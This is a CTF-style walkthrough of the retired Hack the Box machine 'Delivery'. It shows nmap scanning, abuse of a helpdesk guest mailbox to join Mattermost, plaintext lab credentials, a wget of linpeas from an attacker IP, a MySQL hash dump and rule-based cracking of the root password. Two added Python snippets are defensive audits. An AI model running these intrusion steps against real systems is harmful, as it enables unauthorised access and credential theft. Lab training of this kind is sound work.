Hello everyone, and welcome to yet another CTF challenge from Hack the Box, called "Delivery," which is available online for those who want to increase their skills in penetration testing and black-box testing. Delivery is a retired vulnerable lab presented by Hack the Box, which has a large collection of vulnerable labs as challenges ranging from beginner to expert level, so you can practise at a level that suits your experience. The challenge was designed by IppSec.
Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.
Level: Easy
Task: Find user.txt and root.txt in the victim's machine
Penetration Methodologies
- Scanning
- Nmap
- Enumeration
- Using /etc/hosts for custom domain
- Browsing HTTP service
- Enumerating email service
- Exploitation
- Extracting database credentials from mattermost
- Cracking Password using hashcat rule based attack
- Privilege Escalation
- Cracking the password using john the ripper
- Capturing the flag
Walkthrough
Network Scanning
Let's get started then!
To attack any machine, we need its IP address. Machines hosted on HackTheBox have a static IP address.
IP Address assigned to the delivery machine: 10.129.149.209
We have added the IP Address in our /etc/hosts file as delivery.htb to make our enumeration and handling better.
Code:
nano /etc/hosts
10.129.149.209 delivery.htb

Let us scan the VM with nmap, the most popular port-scanning tool, to enumerate open ports on the machine.
Code:
nmap -p- -A delivery.htb

From the result below we found three open ports on the VM: SSH (22), HTTP (80) and an unknown service (8065). Since the nmap results show an HTTP service on port 80, we browse to the target's IP address in the browser and find a simple HTML page.
Since we have added the host, we can now see the website in the browser by visiting http://delivery.htb.

We clicked on helpdesk and found another link that points to a helpdesk subdomain, so we update the hosts file /etc/hosts with helpdesk.delivery.htb.
Code:
nano /etc/hosts
10.129.149.79 delivery.htb helpdesk.delivery.htb

With the subdomain added, we continue enumerating by visiting http://helpdesk.delivery.htb, which runs a support ticket web application powered by osTicket.

According to the hint we got before on the contact us page, a valid email address must end with the @delivery.htb domain to access the Mattermost server. So, we try to open a ticket as a guest user.

We got a success message saying that our ticket was created as a guest user, and it also gave us an email address ([email protected]); replying directly to that address updates the ticket on the customer portal. In effect, the helpdesk hands any guest a readable mailbox on the trusted domain.
So, let's leverage this feature to gain access to the Mattermost service.

Based on the hint we got earlier, we need an @delivery.htb email address to access the Mattermost server. So, let's enumerate Mattermost, which is running on port 8065. Here we could see an option to create an account.

So, let's sign up using the email address from the support ticket ([email protected]), which we received when we opened a new ticket.

To get the confirmation email we need to access the customer support portal. Let's go back and use the check ticket option on the helpdesk, with the ticket ID and email [email protected], to view the ticket we opened.

Here we can see a confirmation email from the Mattermost server.

We copy it and paste it into the browser to activate the email and access the Mattermost server. Once verified, we log in and see if we can find something interesting.

On logging in we get the option to join the internal team. Once joined, we see a chat from the root user that mentions some SSH credentials.

There is also a message that says to stop "using common password variations because of how easily it can be exploited". So, let's first log in to the server over SSH with the credentials.
Code:
Username: maildeliverer
Password: Youve_G0t_Mail!
ssh [email protected]
Once connected we can see the user.txt flag, but we are focused on getting the root flag first, so we immediately ran linpeas to look for weaknesses on the server.
Code:
cd /tmp
wget 10.10.14.108:8080/linpeas.sh
chmod 777 linpeas.sh

The user maildeliverer is a basic user with no sudo privileges. However, a MySQL database is running because the ticketing system stores ticket details in it, and while looking through the files we found that the Mattermost service has writable access and stores its configuration in /opt/mattermost/config/config.json.

So, after opening the config.json file we found database credentials under SqlSettings.
Code:
cd /opt
ls
cd mattermost
ls
cd config
cat config.json

The database credentials are:
Code:
Username: mmuser
Password: Crack_The_MM_Admin_PW
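The underlying weakness is a service config file that a low-privileged local user can read while it carries the database password in SqlSettings. The following is an added example, not part of the original walkthrough: a small audit that flags that condition. The sample config, its placeholder password and the 3306 port are constructed for the demonstration.

```python
import json
import os
import re
import stat
import tempfile

# go-sql-driver DSN shape: user:password@tcp(host:port)/dbname
DSN_RE = re.compile(r"^(?P<user>[^:@/]+):(?P<password>[^@]+)@")


def audit_config(path):
    """Return findings for a Mattermost-style config.json at `path`."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, encoding="utf-8") as fh:
        cfg = json.load(fh)
    dsn = cfg.get("SqlSettings", {}).get("DataSource", "")
    match = DSN_RE.match(dsn)
    # A password in the DSN only matters here if other accounts can read it.
    if match and mode & stat.S_IROTH:
        findings.append(
            f"DB password for '{match.group('user')}' readable by any local user")
    if mode & stat.S_IWOTH:
        findings.append("config is world-writable")
    return findings


def demo():
    """Audit a constructed sample before and after tightening the file mode."""
    sample = {"SqlSettings": {
        "DriverName": "mysql",
        # Constructed value, not the credential from the walkthrough.
        "DataSource": "mmuser:EXAMPLE_ONLY@tcp(127.0.0.1:3306)/mattermost"}}
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "config.json")
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(sample, fh)
        os.chmod(path, 0o666)          # weak: any account can read and write
        before = audit_config(path)
        os.chmod(path, 0o600)          # corrected: service account only
        after = audit_config(path)
    return before, after


if __name__ == "__main__":
    print(demo())
```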

We connect to the database with the credentials we have found in mattermost config.json using the command below.
Code:
mysql -h 127.0.0.1 -u'mmuser' -p

We list the available databases and find only the default ones and mattermost, so we select the mattermost database and list its tables.
Code:
show databases;
use mattermost;
show tables;

We found many tables; the Users table looks the most interesting, so let's check whether we can find some root credentials in it.
Code:
select Username, password from Users;
We are only interested in the root user, but the problem here is that the password is stored as a hash. Save the hash in a file called hash.

Previously, the root user gave a hint in chat that the password should be a variant of PleaseSubscribe!, so we created a custom wordlist instead of using rockyou.txt.

We saved PleaseSubscribe! in a file and then generated variants of it with a hashcat rule. There are many rule files in /usr/share/hashcat/rules, so let's start with the one called "best".
Code:
nano file
cat file
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout file > dict.txt

Once our dictionary is created, we can use it to crack the hash with John the Ripper.
Code:
john --wordlist=/root/dict.txt hash
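The root password fell because it was a rule-derived variant of a phrase already known to be in use. The following is an added example, not part of the original walkthrough: a check for password-change time that rejects candidates reducible to a banned base word. It goes beyond the single appended-digits case to cover look-alike substitutions, reversal, duplication and truncation; the function names and thresholds are assumptions.

```python
import re

# Collapse look-alike characters so "1", "!", "i" and "l" compare equal, etc.
CANON = str.maketrans({"0": "o", "1": "l", "!": "l", "i": "l", "3": "e",
                       "4": "a", "@": "a", "5": "s", "$": "s", "7": "t"})


def core(word):
    """Reduce a password to the letters a mangling rule would have started from."""
    w = word.lower()
    w = re.sub(r"^[^a-z]+|[^a-z]+$", "", w)  # drop prepended/appended digits, symbols
    w = w.translate(CANON)                    # undo look-alike substitutions
    return re.sub(r"[^a-z]", "", w)           # drop separators left in the middle


def matched_base(candidate, banned, min_len=6, min_prefix=0.75):
    """Return the banned base word that `candidate` derives from, or None."""
    cand = core(candidate)
    for base in banned:
        b = core(base)
        if len(b) < min_len:
            continue                      # too short to match reliably
        for form in (cand, cand[::-1]):   # reversal is a stock mangling rule
            if b in form:                 # affixes added, or base duplicated
                return base
            if len(form) >= min_prefix * len(b) and b.startswith(form):
                return base               # base with trailing characters removed
    return None


if __name__ == "__main__":
    banned = ["PleaseSubscribe!"]         # phrase the walkthrough says was reused
    for pw in ("PleaseSubscribe!21", "P13as3Subscr1be!", "correct-horse-battery-staple"):
        print(pw, "->", matched_base(pw, banned))
```

Run it against every known-compromised or previously used phrase for the account, not only a generic dictionary.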

Code:
su root
PleaseSubscribe!21
cd /root
cat root.txt
